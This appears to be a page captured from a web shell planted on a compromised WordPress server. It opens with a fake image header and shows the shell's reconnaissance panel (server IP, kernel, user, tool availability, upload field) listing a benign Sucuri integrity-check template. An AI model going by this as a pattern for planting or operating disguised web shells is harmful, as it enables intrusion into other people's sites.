????JFIF??x?x????'
Server IP : 104.21.96.1 / Your IP : 216.73.216.145 Web Server : LiteSpeed System : Linux premium151.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64 User : tempvsty ( 647) PHP Version : 8.0.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : OFF | Pkexec : OFF Directory : /home/tempvsty/./pontiacques.org/wp-content/plugins/sucuri-scanner/inc/tpl/ |
Upload File : |
<script type="text/javascript"> /* global jQuery */ /* jshint camelcase: false */ jQuery(document).ready(function ($) { $.post('%%SUCURI.AjaxURL.Dashboard%%', { action: 'sucuriscan_ajax', sucuriscan_page_nonce: '%%SUCURI.PageNonce%%', sucuriscan_sitecheck_refresh: '%%SUCURI.SiteCheck.Refresh%%', form_action: 'check_wordpress_integrity', }, function (data) { $('#sucuriscan-integrity-response').html(data); }); }); </script> <div id="sucuriscan-integrity-response"> <!-- Populated by JavaScript --> <div class="sucuriscan-panel sucuriscan-integrity sucuriscan-integrity-loading"> <div class="sucuriscan-clearfix"> <div class="sucuriscan-pull-left sucuriscan-integrity-left"> <h2 class="sucuriscan-title">{{WordPress Integrity}}</h2> <p>{{We inspect your WordPress installation and look for modifications on the core files as provided by WordPress.org. Files located in the root directory, wp-admin and wp-includes will be compared against the files distributed with v%%SUCURI.WordPressVersion%%; all files with inconsistencies will be listed here. Any changes might indicate a hack.}}</p> </div> <div class="sucuriscan-pull-right sucuriscan-integrity-right"> <div class="sucuriscan-integrity-missing"> <!-- Missing data; display loading message --> </div> </div> </div> <p>{{Loading...}}</p> </div> </div>